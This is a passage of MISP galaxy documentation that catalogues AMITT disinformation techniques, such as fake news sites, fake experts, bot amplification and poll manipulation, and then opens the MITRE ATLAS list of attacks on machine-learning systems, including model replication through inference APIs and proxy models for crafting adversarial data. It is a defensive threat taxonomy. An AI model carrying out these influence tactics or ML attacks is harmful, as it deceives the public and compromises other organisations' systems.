https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0007.md

Create fake or imposter news sites

Modern computational propaganda makes use of a cadre of imposter news sites spreading globally. These sites, sometimes motivated by concerns other than propaganda (for instance, click-based revenue), often have some superficial markers of authenticity, such as naming and site design. But many can be quickly exposed with reference to their ownership, reporting history and advertising details. A prominent case from the 2016 era was the Denver Guardian, which purported to be a local newspaper in Colorado and specialized in negative stories about Hillary Clinton.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake or imposter news sites"

Table 5164. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0008.md

Create fake experts

Stories planted or promoted in computational propaganda operations often make use of experts fabricated from whole cloth, sometimes specifically for the story itself. For example, in the Jade Helm conspiracy theory promoted by SVR in 2015, a pair of experts (one of them naming himself a "Military Intelligence Analyst / Russian Regional CME" and the other a "Geopolitical Strategist, Journalist & Author") pushed the story heavily on LinkedIn.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake experts"

Table 5165. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0009.md

Cultivate useful idiots

Cultivate propagandists for a cause, the goals of which are not fully comprehended, and who are used cynically by the leaders of the cause. Independent actors use social media and specialised websites to strategically reinforce and spread messages compatible with their own. Their networks are infiltrated and used by state media disinformation organisations to amplify the state’s own disinformation strategies against target populations. Many are traffickers in conspiracy theories or hoaxes, unified by a suspicion of Western governments and mainstream media. Their narratives, which appeal to leftists hostile to globalism and military intervention and nationalists against immigration, are frequently infiltrated and shaped by state-controlled trolls and altered news items from agencies such as RT and Sputnik. Also known as "useful idiots" or "unwitting agents".

The tag is: misp-galaxy:amitt-misinformation-pattern="Cultivate useful idiots"

Table 5166. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0010.md

Hijack legitimate account

Hack or take over legitimate accounts to distribute misinformation or damaging content. Examples include the Syrian Electronic Army’s (2013) series of false tweets from a hijacked Associated Press Twitter account claiming that President Barack Obama had been injured in a series of explosions near the White House. The false report caused a temporary plunge of 143 points on the Dow Jones Industrial Average.

The tag is: misp-galaxy:amitt-misinformation-pattern="Hijack legitimate account"

Table 5167. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0011.md

Use concealment

Use anonymous social media profiles. Examples include anonymous page or group administrators, masked "whois" website directory data, no bylines connected to news articles, and no masthead connected to news websites.

Examples include the 2016 @TEN_GOP profile, where the actual Tennessee Republican Party tried unsuccessfully for months to get Twitter to shut it down, and Endless Mayfly (2019), an Iran-aligned network of inauthentic personas and social media accounts that spreads falsehoods and amplifies narratives critical of Saudi Arabia, the United States, and Israel.

The tag is: misp-galaxy:amitt-misinformation-pattern="Use concealment"

Table 5168. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0012.md

Create fake websites

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake websites"

Table 5169. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0013.md

Create funding campaigns

Generate revenue through online funding campaigns, e.g. gather data and advance a credible persona via Gofundme or Patreon, or via a fake website connecting through PayPal or Stripe. Example (2016): #VaccinateUS Gofundme campaigns to pay for targeted Facebook ads (Larry Cook, targeting Washington State mothers, $1,776 to boost posts over 9 months).

The tag is: misp-galaxy:amitt-misinformation-pattern="Create funding campaigns"

Table 5170. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0014.md

Create hashtag

Many incident-based campaigns will create a hashtag to promote their fabricated event (e.g. #ColumbianChemicals to promote a fake story about a chemical spill in Louisiana).

Creating a hashtag for an incident can have two important effects:

  1. Create a perception of reality around an event. Certainly only "real" events would be discussed in a hashtag. After all, the event has a name!

  2. Publicize the story more widely through trending lists and search behavior.

Asset needed to direct/control/manage the "conversation" connected to launching a new incident/campaign with a new hashtag on the applicable social media sites (i.e. Twitter, LinkedIn).

The tag is: misp-galaxy:amitt-misinformation-pattern="Create hashtag"

Table 5171. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0015.md

Clickbait

Create attention-grabbing headlines (outrage, doubt, humor) required to drive traffic and engagement. (Example 2016) “Pope Francis shocks world, endorses Donald Trump for president.” (Example 2016) “FBI director received millions from Clinton Foundation, his brother’s law firm does Clinton’s taxes.” This is a key asset.

The tag is: misp-galaxy:amitt-misinformation-pattern="Clickbait"

Table 5172. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0016.md

Promote online funding

Drive traffic/engagement to funding campaign sites; helps provide measurable metrics to assess conversion rates

The tag is: misp-galaxy:amitt-misinformation-pattern="Promote online funding"

Table 5173. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0017.md

Paid targeted ads

Create or fund advertisements targeted at specific populations

The tag is: misp-galaxy:amitt-misinformation-pattern="Paid targeted ads"

Table 5174. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0018.md

Generate information pollution

Flood social channels; drive traffic/engagement to all assets; create aura/sense/perception of pervasiveness/consensus (for or against or both simultaneously) of an issue or topic. "Nothing is true, but everything is possible." Akin to astroturfing campaign.

The tag is: misp-galaxy:amitt-misinformation-pattern="Generate information pollution"

Table 5175. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0019.md

Trial content

Iteratively test incident performance (messages, content etc.), e.g. A/B test headline/content engagement metrics; website and/or funding campaign conversion rates.

The tag is: misp-galaxy:amitt-misinformation-pattern="Trial content"

Table 5176. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0020.md

Memes

Memes are one of the most important single artefact types in all of computational propaganda. In this framework, "memes" denotes the narrow image-based definition. But that naming is no accident, as these items have most of the important properties of Dawkins' original conception as a self-replicating unit of culture. Memes pull together reference and commentary; image and narrative; emotion and message. Memes are a powerful tool and the heart of modern influence campaigns.

The tag is: misp-galaxy:amitt-misinformation-pattern="Memes"

Table 5177. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0021.md

Conspiracy narratives

Conspiracy narratives appeal to the human desire for explanatory order, by invoking the participation of powerful (often sinister) actors in pursuit of their own political goals. These narratives are especially appealing when an audience is low-information, marginalized or otherwise inclined to reject the prevailing explanation. Conspiracy narratives are an important component of the "firehose of falsehoods" model.

Example: QAnon. A conspiracy theory is an explanation of an event or situation that invokes a conspiracy by sinister and powerful actors, often political in motivation, when other explanations are more probable.

The tag is: misp-galaxy:amitt-misinformation-pattern="Conspiracy narratives"

Table 5178. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0022.md

Distort facts

Change, twist, or exaggerate existing facts to construct a narrative that differs from reality. Example: images and ideas can be distorted by being placed in an improper context.

The tag is: misp-galaxy:amitt-misinformation-pattern="Distort facts"

Table 5179. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0023.md

Create fake videos and images

Create fake videos and/or images by manipulating existing content or generating new content (e.g. deepfakes). Examples include the Pelosi video (making her appear drunk) and the photoshopped shark on the flooded streets of Houston, TX.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake videos and images"

Table 5180. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0024.md

Leak altered documents

Obtain documents (eg by theft or leak), then alter and release, possibly among factual documents/sources.

Example (2019): the DFRLab report “Secondary Infektion” highlights an incident whose key asset was a forged “letter” created by the operation to provide ammunition for far-right forces in Europe ahead of the election.

The tag is: misp-galaxy:amitt-misinformation-pattern="Leak altered documents"

Table 5181. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0025.md

Create fake research

Create fake academic research. Example: fake social science research is often aimed at hot-button social issues such as gender, race and sexuality. Fake science research can target the climate science debate or pseudoscience such as anti-vaxx.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake research"

Table 5182. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0026.md

Adapt existing narratives

Adapting existing narratives to current operational goals is the tactical sweet-spot for an effective misinformation campaign. Leveraging existing narratives is not only more effective, it requires substantially less resourcing, as the promotion of new master narratives operates on a much larger scale, in both time and scope. Fluid, dynamic and often interchangeable key master narratives (e.g. "The morally corrupt West") can be adapted to divisive ends (LGBT propaganda) or to distort (individuals working as CIA operatives). For Western audiences, different but equally powerful framings are available, such as "USA has a fraught history in race relations, especially in criminal justice areas."

The tag is: misp-galaxy:amitt-misinformation-pattern="Adapt existing narratives"

Table 5183. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0027.md

Create competing narratives

Misinformation promotes an agenda by advancing narratives supportive of that agenda. This is most effective when the advanced narrative pre-dates the revelation of the specific misinformation content. But this is often not possible.

Suppressing or discouraging narratives already spreading requires an alternative. The most simple set of narrative techniques in response would be the construction and promotion of contradictory alternatives centered on denial, deflection, dismissal, counter-charges, excessive standards of proof, bias in prohibition or enforcement, and so on.

These competing narratives allow loyalists cover, but are less compelling to opponents and fence-sitters than campaigns built around existing narratives or highly explanatory master narratives. Competing narratives, as such, are especially useful in the "firehose of misinformation" approach.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create competing narratives"

Table 5184. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0028.md

Manipulate online polls

Create fake online polls, or manipulate existing online polls. Examples: flooding the FCC with comments; creating fake engagement metrics on Twitter/Facebook polls to manipulate perception of a given issue. Also a data gathering tactic to target those who engage, and potentially their networks of friends/followers as well.

The tag is: misp-galaxy:amitt-misinformation-pattern="Manipulate online polls"

Table 5185. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0029.md

Backstop personas

Create other assets/dossiers/cover/fake relationships and/or connections or documents, sites, bylines, attributions, to establish/augment/inflate credibility/believability.

The tag is: misp-galaxy:amitt-misinformation-pattern="Backstop personas"

Table 5186. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0030.md

YouTube

Use YouTube as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="YouTube"

Table 5187. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0031.md

Reddit

Use Reddit as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Reddit"

Table 5188. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0032.md

Instagram

Use Instagram as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Instagram"

Table 5189. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0033.md

LinkedIn

Use LinkedIn as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="LinkedIn"

Table 5190. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0034.md

Pinterest

Use Pinterest as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Pinterest"

Table 5191. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0035.md

WhatsApp

Use WhatsApp as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="WhatsApp"

Table 5192. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0036.md

Facebook

Use Facebook as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Facebook"

Table 5193. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0037.md

Twitter

Use Twitter as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter"

Table 5194. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0038.md

Bait legitimate influencers

The tag is: misp-galaxy:amitt-misinformation-pattern="Bait legitimate influencers"

Table 5195. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0039.md

Demand unsurmountable proof

The tag is: misp-galaxy:amitt-misinformation-pattern="Demand unsurmountable proof"

Table 5196. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0040.md

Deny involvement

The tag is: misp-galaxy:amitt-misinformation-pattern="Deny involvement"

Table 5197. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0041.md

Kernel of Truth

The tag is: misp-galaxy:amitt-misinformation-pattern="Kernel of Truth"

Table 5198. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0042.md

Use SMS/ WhatsApp/ Chat apps

The tag is: misp-galaxy:amitt-misinformation-pattern="Use SMS/ WhatsApp/ Chat apps"

Table 5199. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0043.md

Seed distortions

The tag is: misp-galaxy:amitt-misinformation-pattern="Seed distortions"

Table 5200. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0044.md

Use fake experts

Use the fake experts that were set up in T0009. Pseudo-experts are disposable assets that often appear once and then disappear. They give "credibility" to misinformation and take advantage of credential bias.

The tag is: misp-galaxy:amitt-misinformation-pattern="Use fake experts"

Table 5201. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0045.md

Search Engine Optimization

Manipulate content engagement metrics (i.e. Reddit and Twitter) to influence/impact news search results (e.g. Google); this also elevates RT and Sputnik headlines into Google News alert emails. Also known as "black-hat SEO".

The tag is: misp-galaxy:amitt-misinformation-pattern="Search Engine Optimization"

Table 5202. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0046.md

Muzzle social media as a political force

Use political influence or the power of the state to stop critical social media comments, e.g. government-requested/driven content takedowns (see Google Transparency reports). (Example 2019) Singapore's Protection from Online Falsehoods and Manipulation Bill would make it illegal to spread "false statements of fact" in Singapore, where that information is "prejudicial" to Singapore’s security or "public tranquility." Or India/New Delhi has cut off services to Facebook and Twitter in Kashmir 28 times in the past five years, and in 2016 access was blocked for five months, on the grounds that these platforms were being used for anti-social and "anti-national" purposes.

The tag is: misp-galaxy:amitt-misinformation-pattern="Muzzle social media as a political force"

Table 5203. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0047.md

Cow online opinion leaders

Intimidate, coerce, threaten critics/dissidents/journalists via trolling, doxing. Philippines (example): Maria Ressa and Rappler journalists were targeted by the Duterte regime with lawsuits and trolling, and banned from the presidential palace where press briefings take place. 2017: bot attack on five ProPublica journalists.

The tag is: misp-galaxy:amitt-misinformation-pattern="Cow online opinion leaders"

Table 5204. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0048.md

Flooding

Flooding and/or mobbing social media channels, feeds and/or hashtags with an excessive volume of content to control/shape online conversations and/or drown out opposing points of view. Bots and/or patriotic trolls are effective tools to achieve this effect.

Example (2018): bots flood social media promoting messages which support Saudi Arabia with intent to cast doubt on allegations that the kingdom was involved in Khashoggi’s death.

The tag is: misp-galaxy:amitt-misinformation-pattern="Flooding"

Table 5205. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0049.md

Cheerleading domestic social media ops

Deploy state-coordinated social media commenters and astroturfers. Covers both internal/domestic and external social media influence operations, popularized by China (the 50 Cent Army manages messaging inside the "Great Firewall"); the technique is also used by Chinese English-language social media influence operations, which are seeded by state-run media that overwhelmingly present a positive, benign, and cooperative image of China.

The tag is: misp-galaxy:amitt-misinformation-pattern="Cheerleading domestic social media ops"

Table 5206. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0050.md

Fabricate social media comment

Use government-paid social media commenters, astroturfers, and chat bots (programmed to reply to specific keywords/hashtags) to influence online conversations, product reviews, and website comment forums. (2017 example) the FCC was inundated with nearly 22 million public comments on net neutrality (many from fake accounts).

The tag is: misp-galaxy:amitt-misinformation-pattern="Fabricate social media comment"

Table 5207. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0051.md

Tertiary sites amplify news

Create content/news/opinion websites to cross-post stories. Tertiary sites circulate and amplify narratives. Often these sites have no masthead, bylines or attribution.

Examples of tertiary sites include Russia Insider, The Duran, geopolitica.ru, Mint Press News, Oriental Review, globalresearch.ca.

Example (2019, domestic news): Snopes reveals that Star News Digital Media, Inc. may look like a media company that produces local news, but operates via undisclosed connections to political activism.

Example (2018): FireEye reports on an Iranian campaign that, between April 2018 and March 2019, created sites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front, used to spread inauthentic content during the US mid-terms.

The tag is: misp-galaxy:amitt-misinformation-pattern="Tertiary sites amplify news"

Table 5208. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0052.md

Twitter trolls amplify and manipulate

Use trolls to amplify narratives and/or manipulate narratives. Fake profiles/sockpuppets operate to support individuals/narratives from the entire political spectrum (left/right binary). They operate with increased emphasis on promoting local content and promoting real Twitter users generating their own, often divisive, political content, as it’s easier to amplify existing content than to create new/original content. Trolls operate wherever there’s a socially divisive issue (issues that can be or are politicized), e.g. BlackLivesMatter or MeToo.

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter trolls amplify and manipulate"

Table 5209. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0053.md

Twitter bots amplify

Use bots to amplify narratives above algorithm thresholds. Bots are automated/programmed profiles designed to amplify content (i.e. automatically retweet or like) and give the appearance that it’s more "popular" than it is. They can operate as a network, to function in a coordinated/orchestrated manner. In some cases (more so now) they are inexpensive/disposable assets used for minimal deployment as bot detection tools improve and platforms become more responsive. (Example 2019) #TrudeauMustGo

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter bots amplify"

Table 5210. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0054.md

Use hashtag

Use the dedicated hashtag for the incident (e.g. #PhosphorusDisaster)

The tag is: misp-galaxy:amitt-misinformation-pattern="Use hashtag"

Table 5211. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0055.md

Dedicated channels disseminate information pollution

Output information pollution (e.g. articles on an unreported false story/event) through channels controlled by or related to the incident creator. Examples include RT/Sputnik or antivax websites seeding stories.

The tag is: misp-galaxy:amitt-misinformation-pattern="Dedicated channels disseminate information pollution"

Table 5212. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0056.md

Organise remote rallies and events

Coordinate and promote real-world events across media platforms, e.g. rallies, protests, gatherings in support of incident narratives. Example: Facebook groups/pages coordinate and move divisive/polarizing groups and activities into the public space. (Example) Mueller’s report highlights that the IRA organized political rallies in the U.S. using social media starting in 2015 and continued to coordinate rallies after the 2016 election.

The tag is: misp-galaxy:amitt-misinformation-pattern="Organise remote rallies and events"

Table 5213. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0057.md

Legacy web content

Make incident content visible for a long time, e.g. by exploiting platform terms of service, or placing it where it’s hard to remove or unlikely to be removed.

The tag is: misp-galaxy:amitt-misinformation-pattern="Legacy web content"

Table 5214. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0058.md

Play the long game

The tag is: misp-galaxy:amitt-misinformation-pattern="Play the long game"

Table 5215. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0059.md

Continue to amplify

The tag is: misp-galaxy:amitt-misinformation-pattern="Continue to amplify"

Table 5216. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0060.md

Sell merchandising

Sell hats, t-shirts, flags and other branded content that’s designed to be seen in the real world

The tag is: misp-galaxy:amitt-misinformation-pattern="Sell merchandising"

Table 5217. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0061.md

MITRE ATLAS Attack Pattern

MITRE ATLAS Attack Pattern - Adversarial Threat Landscape for Artificial-Intelligence Systems.

MITRE ATLAS Attack Pattern is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Search for Victim’s Publicly Available Research Materials

Adversaries may search publicly available research to learn how and where machine learning is used within a victim organization. The adversary can use this information to identify targets for attack, or to tailor an existing attack to make it more effective. Organizations often use open source model architectures trained on additional proprietary data in production. Knowledge of this underlying architecture allows the adversary to craft more realistic proxy models ([Create Proxy ML Model](https://atlas.mitre.org/techniques/AML.T0005)). An adversary can search these resources for publications by authors employed at the victim organization.

Research materials may exist as academic papers published in [Journals and Conference Proceedings](https://atlas.mitre.org/techniques/AML.T0000.000), or stored in [Pre-Print Repositories](https://atlas.mitre.org/techniques/AML.T0000.001), as well as [Technical Blogs](https://atlas.mitre.org/techniques/AML.T0000.002).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Search for Victim’s Publicly Available Research Materials"

Table 5218. Table References

Links

https://atlas.mitre.org/techniques/AML.T0000

Journals and Conference Proceedings

Many of the publications accepted at premier machine learning conferences and journals come from commercial labs. Some journals and conferences are open access, others may require paying for access or a membership. These publications will often describe in detail all aspects of a particular approach for reproducibility. This information can be used by adversaries to implement the paper.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Journals and Conference Proceedings"

Table 5219. Table References

Links

https://atlas.mitre.org/techniques/AML.T0000.000

Pre-Print Repositories

Pre-print repositories, such as arXiv, contain the latest academic research papers that haven’t been peer reviewed. They may contain research notes, or technical reports that aren’t typically published in journals or conference proceedings. Pre-print repositories also serve as a central location to share papers that have been accepted to journals. Searching pre-print repositories provides adversaries with a relatively up-to-date view of what researchers in the victim organization are working on.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Pre-Print Repositories"

Table 5220. Table References

Links

https://atlas.mitre.org/techniques/AML.T0000.001

Technical Blogs

Research labs at academic institutions and company R&D divisions often have blogs that highlight their use of machine learning and its application to the organization's unique problems. Individual researchers also frequently document their work in blog posts. An adversary may search for posts made by the target victim organization or its employees. In comparison to [Journals and Conference Proceedings](https://atlas.mitre.org/techniques/AML.T0000.000) and [Pre-Print Repositories](https://atlas.mitre.org/techniques/AML.T0000.001), this material will often contain more practical aspects of the machine learning system. This could include the underlying technologies and frameworks used, and possibly some information about the API access and use case. This will help the adversary better understand how that organization is using machine learning internally and the details of their approach that could aid in tailoring an attack.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Technical Blogs"

Table 5221. Table References

Links

https://atlas.mitre.org/techniques/AML.T0000.002

Search for Publicly Available Adversarial Vulnerability Analysis

Much like the [Search for Victim’s Publicly Available Research Materials](https://atlas.mitre.org/techniques/AML.T0000), there is often ample research available on the vulnerabilities of common models. Once a target has been identified, an adversary will likely try to identify any pre-existing work that has been done for this class of models. This will include not only reading academic papers that may identify the particulars of a successful attack, but also identifying pre-existing implementations of those attacks. The adversary may obtain [Adversarial ML Attack Implementations](https://atlas.mitre.org/techniques/AML.T0016.000) or develop [Adversarial ML Attacks](https://atlas.mitre.org/techniques/AML.T0017.000) of their own if necessary.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Search for Publicly Available Adversarial Vulnerability Analysis"

Table 5222. Table References

Links

https://atlas.mitre.org/techniques/AML.T0001

Acquire Public ML Artifacts

Adversaries may search public sources, including cloud storage, public-facing services, and software or data repositories, to identify machine learning artifacts. These machine learning artifacts may include the software stack used to train and deploy models, training and testing data, model configurations and parameters. An adversary will be particularly interested in artifacts hosted by or associated with the victim organization as they may represent what that organization uses in a production environment. Adversaries may identify artifact repositories via other resources associated with the victim organization (e.g. [Search Victim-Owned Websites](https://atlas.mitre.org/techniques/AML.T0003) or [Search for Victim’s Publicly Available Research Materials](https://atlas.mitre.org/techniques/AML.T0000)). These ML artifacts often provide adversaries with details of the ML task and approach.

ML artifacts can aid in an adversary’s ability to [Create Proxy ML Model](https://atlas.mitre.org/techniques/AML.T0005). If these artifacts include pieces of the actual model in production, they can be used to directly [Craft Adversarial Data](https://atlas.mitre.org/techniques/AML.T0043). Acquiring some artifacts requires registration (providing user details such as email/name), AWS keys, or written requests, and may require the adversary to [Establish Accounts](https://atlas.mitre.org/techniques/AML.T0021).

Artifacts might be hosted on victim-controlled infrastructure, providing the victim with some information on who has accessed that data.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Acquire Public ML Artifacts"

Table 5223. Table References

Links

https://atlas.mitre.org/techniques/AML.T0002

Datasets

Adversaries may collect public datasets to use in their operations. Datasets used by the victim organization or datasets that are representative of the data used by the victim organization may be valuable to adversaries. Datasets can be stored in cloud storage, or on victim-owned websites. Some datasets require the adversary to [Establish Accounts](https://atlas.mitre.org/techniques/AML.T0021) for access.

Acquired datasets help the adversary advance their operations, stage attacks, and tailor attacks to the victim organization.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Datasets"

Table 5224. Table References

Links

https://atlas.mitre.org/techniques/AML.T0002.000

Models

Adversaries may acquire public models to use in their operations. Adversaries may seek models used by the victim organization or models that are representative of those used by the victim organization. Representative models may include model architectures, or pre-trained models which define the architecture as well as model parameters from training on a dataset. The adversary may search public sources for common model architecture configuration file formats such as YAML or Python configuration files, and common model storage file formats such as ONNX (.onnx), HDF5 (.h5), Pickle (.pkl), PyTorch (.pth), or TensorFlow (.pb, .tflite).

Acquired models are useful in advancing the adversary’s operations and are frequently used to tailor attacks to the victim model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Models"

Table 5225. Table References

Links

https://atlas.mitre.org/techniques/AML.T0002.001

Search Victim-Owned Websites

Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain technical details about their ML-enabled products or services. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info. These sites may also have details highlighting business operations and relationships.

Adversaries may search victim-owned websites to gather actionable information. This information may help adversaries tailor their attacks (e.g. [Adversarial ML Attacks](https://atlas.mitre.org/techniques/AML.T0017.000) or [Manual Modification](https://atlas.mitre.org/techniques/AML.T0043.003)). Information from these sources may reveal opportunities for other forms of reconnaissance (e.g. [Search for Victim’s Publicly Available Research Materials](https://atlas.mitre.org/techniques/AML.T0000) or [Search for Publicly Available Adversarial Vulnerability Analysis](https://atlas.mitre.org/techniques/AML.T0001)).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Search Victim-Owned Websites"

Table 5226. Table References

Links

https://atlas.mitre.org/techniques/AML.T0003

Search Application Repositories

Adversaries may search open application repositories during targeting. Examples of these include Google Play, the iOS App store, the macOS App Store, and the Microsoft Store.

Adversaries may craft search queries seeking applications that contain ML-enabled components. Frequently, the next step is to [Acquire Public ML Artifacts](https://atlas.mitre.org/techniques/AML.T0002).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Search Application Repositories"

Table 5227. Table References

Links

https://atlas.mitre.org/techniques/AML.T0004

Create Proxy ML Model

Adversaries may obtain models to serve as proxies for the target model in use at the victim organization. Proxy models are used to simulate complete access to the target model in a fully offline manner.

Adversaries may train models from representative datasets, attempt to replicate models from victim inference APIs, or use available pre-trained models.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Create Proxy ML Model"

Table 5228. Table References

Links

https://atlas.mitre.org/techniques/AML.T0005

Train Proxy via Gathered ML Artifacts

Proxy models may be trained from ML artifacts (such as data, model architectures, and pre-trained models) that are representative of the target model gathered by the adversary. This can be used to develop attacks that require higher levels of access than the adversary has available or as a means to validate pre-existing attacks without interacting with the target model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Train Proxy via Gathered ML Artifacts"

Table 5229. Table References

Links

https://atlas.mitre.org/techniques/AML.T0005.000

Train Proxy via Replication

Adversaries may replicate a private model. By repeatedly querying the victim’s [ML Model Inference API Access](https://atlas.mitre.org/techniques/AML.T0040), the adversary can collect the target model’s inferences into a dataset. The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.

A replicated model that closely mimics the target model is a valuable resource in staging the attack. The adversary can use the replicated model to [Craft Adversarial Data](https://atlas.mitre.org/techniques/AML.T0043) for various purposes (e.g. [Evade ML Model](https://atlas.mitre.org/techniques/AML.T0015), [Spamming ML System with Chaff Data](https://atlas.mitre.org/techniques/AML.T0046)).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Train Proxy via Replication"

Table 5230. Table References

Links

https://atlas.mitre.org/techniques/AML.T0005.001

Use Pre-Trained Model

Adversaries may use an off-the-shelf pre-trained model as a proxy for the victim model to aid in staging the attack.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Use Pre-Trained Model"

Table 5231. Table References

Links

https://atlas.mitre.org/techniques/AML.T0005.002

Active Scanning

An adversary may probe or scan the victim system to gather information for targeting. This is distinct from other reconnaissance techniques that do not involve direct interaction with the victim system.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Active Scanning"

Table 5232. Table References

Links

https://atlas.mitre.org/techniques/AML.T0006

Discover ML Artifacts

Adversaries may search private sources to identify machine learning artifacts that exist on the system and gather information about them. These artifacts can include the software stack used to train and deploy models, training and testing data management systems, container registries, software repositories, and model zoos.

This information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Artifacts"

Table 5233. Table References

Links

https://atlas.mitre.org/techniques/AML.T0007

Acquire Infrastructure

Adversaries may buy, lease, or rent infrastructure for use throughout their operation. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, mobile devices, and third-party web services. Free resources may also be used, but they are typically limited.

Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Acquire Infrastructure"

Table 5234. Table References

Links

https://atlas.mitre.org/techniques/AML.T0008

ML Development Workspaces

